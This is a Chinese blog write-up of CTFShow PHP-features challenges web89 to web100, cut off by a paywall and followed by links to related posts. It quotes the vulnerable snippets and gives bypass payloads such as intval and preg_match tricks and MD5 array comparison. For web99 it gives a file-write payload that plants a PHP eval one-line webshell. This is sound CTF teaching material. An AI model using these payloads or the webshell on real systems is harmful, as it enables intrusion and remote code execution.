CTFShow PHP特性

原创 已于 2022-04-09 18:15:21 修改 · 876 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2021-07-03 21:33:09 首次发布

##开始PHP特性

web89

if(isset($_GET['num'])){
   
   
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
   
   
        die("no no no!");
    }
    if(intval($num)){
   
   
        echo $flag;

preg_match()返回 pattern的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。
可以通过数组的方式通过
num[]=1

web90

if($num==="4476"){
   
   
        die("no no no!");
    }
    if(intval($num,0)===4476){
   
   
        echo $flag;

intval()函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。
num=010574	8进制
num=0x117c	16进制

web91

if(preg_match('/^php$/im', $a)){
   
   
    if(preg_match('/^php$/i', $a)){
   
   
        echo 'hacker';
    }
    else{
   
   
        echo $flag;
意思大概是先要多行匹配有没有php开头和结尾的
然后单行匹配不能是php开头结尾的

在这里插入图片描述

可以用 %0a 截断,意思其实就是换行
cmd=abc%0aphp

web92~93

同  web90

web94~95

if(preg_match("/[a-z]/i", $num)){
   
   
        die("no no no!");
    }
    if(!strpos($num, "0")){
   
   
        die("no no no!");
strpos查找字符串中第一次出现的位置:
strpos() 函数对大小写敏感。
返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。
strpos函数限制了传参第一位不能为0,如果为0,就die
但如果没有找到又会die

根据弱类型,可以用空格隔开,或者小数
num= 010574
num=4476.0
num=+010574

web96

if($_GET['u']=='flag.php'){
   
   
        die("no no no");
    }else{
   
   
        highlight_file($_GET['u']);
不能直接查看flag.php
可以构造路径查看
u=/var/www/html/flag.php
u=./flag.php

web97

if (isset($_POST['a']) and isset($_POST['b'])) {
   
   
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
简单地方法就是直接数组让MD5报错,这样就相等了
a[]=1&b[]=2
还有就是MD5强碰撞
[MD5强碰撞](https://www.cnblogs.com/kuaile1314/p/11968108.html)

web98

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__)
三元运算:条件表达式?表达式1:表达式2
第一个说只要有GET传参就指向POST,所以随便传个啥都行
GET 1=flag
POST HTTP_FLAG=flag

web99

$allow = array();
for ($i=36; $i < 0x36d; $i++) {
   
    
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
   
   
    file_put_contents($_GET['n'], $_POST['content']);
}
首先是随机数填充数组,但是可以猜测一定有数字1 
in_array() 搜索数组中是否有指定的字符串
因为没有设置第三个参数,所以1.php会被构造成1
file_put_contents($_GET['n'], $_POST['content']);
如果存在就将POST传入的数据写入到GET中,因此可以考虑写入一句话马
GET:n=1.php 
POST:content=<?php  @eval($_POST['360']);?>

web100

//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
   
   
    if(!preg_match("/\;/", $v2)){
   
   
        if(preg_match("/\;/", $v3)){
   
   
            eval("$v2('ctfshow')$v3");
首先知道 = 的优先级是高于
最低0.47元/天 解锁文章
ctfshow---php特性
fainpo的博客
04-02 2290
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。
[ctfshow]php特性3
qq_61109509的博客
04-09 1117
文章目录web111web112web113总结一下伪协议 web111 由下面正则可知,v1传ctfshow就行 $$v1=&$$v2 &类似于指针,其实这个语句就是变量覆盖。我们想要flag,但是include(flag.php)是在函数之外的,我们可以传参进来,例如v2=_GET[‘flag’],但是下划线已经🈲了,所以我们考虑用全局变量 由于var_dump能显示类型,所以这样构造 ?v1=ctfshow & v2=GLOBALS web112 这个题的意思是必
CTFshow php特性 web99
Kradress的博客
12-14 805
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 22:36:12 # @link: https://ctfer.com */ highlight_file(__FILE__); $allow = array(); //$allow
ctfshow——PHP特性
qq_55202378的博客
01-03 1560
另外,intval()函数如果$base为0,则$var中存在字母的话遇到字母就停止读取,传入4476a会将后面的a丢弃,比较前面的.
CTFshow-php特性
weixin_44770698的博客
07-11 2515
CTFshow-php特性学习
ctfshow php特性 web112
U_U520的博客
12-05 669
考点:php伪协议 绕过is_file+highlight_file 对于文件的检测 我们的目的是即不能让is_file检测出是文件,还要让 highlight_file可以识别为文件。这时候可以利用php伪协议。 可以直接用不带任何过滤器的filter伪协议 也可以用一些没有过滤掉的编码方式和转换方式 还有一些可以编码的,比如base64编码convert.base-encode64部分可以二次编码绕过(包含调用 时会解一次码)
CTFshow php特性 web101
Kradress的博客
12-14 907
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
CTFshow php特性 web106
Kradress的博客
12-14 280
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 22:38:27 */ highlight_file(__FILE__); include("flag.php"); if(isset($_POST['v1']) &&amp
CTFshow php特性 web140
Kradress的博客
12-18 480
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-17 12:39:25 */ error_reporting(0); highlight_file(__FILE__); if(isset($_POST['f1']) && i
CTFshow php特性 web98
Kradress的博客
12-14 928
目录源码思路题解总结 源码 Notice: Undefined index: flag in /var/www/html/index.php on line 15 Notice: Undefined index: flag in /var/www/html/index.php on line 16 Notice: Undefined index: HTTP_FLAG in /var/www/html/index.php on line 17 <?php /* # -*- coding: ut
CTFSHOW-PHP特性
Yb_140的博客
04-23 3207
web89 intval()函数:用于获取变量的整数值。 ?num[]= web90 ?num=0x117c ?num=4476a web91 preg_match('/^php$/im', $a) php开头,php结尾,i大小写,m多行匹配 ?cmd=%0aphp web92 ?num=0x117c ?num=010574 web93 ?num=010574 web94 strpos()函数:函数查找字符串在另一字符串中第一次出现的位置 ?n
ctfshow php特性
zbbjya的博客
05-31 1136
web89 include("flag.php");#包含一个flag的php文件 highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 可知其限制这个数不能等于
ctfshow (php特性篇)
qq_45766062的博客
12-01 1051
web97 <?php include("flag.php"); highlight_file(__FILE__); if (isset($_POST['a']) and isset($_POST['b'])) { if ($_POST['a'] != $_POST['b']) if (md5($_POST['a']) === md5($_POST['b'])) echo $flag; else print 'Wrong.'; } ?> php的MD5()函数不能处理数组,遇到
ctfshow web入门 php特性
Lum1n0us's Blog
02-18 2310
文章目录web89web90web91web92姿势一姿势二姿势三web93web94web95web96姿势一姿势二web97web98web99web100姿势一姿势二姿势三web101web102-103web104web105web106web107web108web109姿势一姿势二web110web111web112姿势一姿势二姿势三姿势四web113姿势一姿势二web114web115web123web125web126web127web128web129姿势一姿势二web130web131w
CTFSHOW-php特性
灰太的表格的博客
02-23 286
web89 intval():成功时返回 var 的 integer 值,失败时返回 0。 空的 array 返回 0,非空的 array 返回 1。 preg_match传数组返回为false payload:?num[]=a web90 ?num=0x117c web91 Apache HTTPD 换行解析漏洞(CVE-2017-15715) 正则表达式中的 $与^ apache这次解析漏洞的根本原因就是这个 $,正则表达式中,我们都知道$用来匹配字符串结尾位置,我们来看看菜鸟教程中对正则表达符$的
WEB ---- ctfshow ---- PHP特性
L0g1c的博客
08-04 506
仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量,或者未初始化的变量将发出错误信息。关于or,and的使用,查资料得知:and相当于then,or相当于else。第二种格式做同样的事,只除了当前单元的键名也会在每次循环中被赋给变量。— 把第一个参数作为回调函数调用,其余参数是回调函数的参数。本题和web104,是一样的,补充了web104的不足,添加了。函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回。的含义解释:根据第二个参数进行数值获取,即转化所使用的进制。............
ctfshow-php特性
m0_74071940的博客
03-30 566
ctfshowPHP特性题目
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令执行的代码。这些引用都提到了ctfshow php特性,但并没有详细说明这些特性是什么。由于没有更多的上下文信息,我无法提供更详细的答案。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值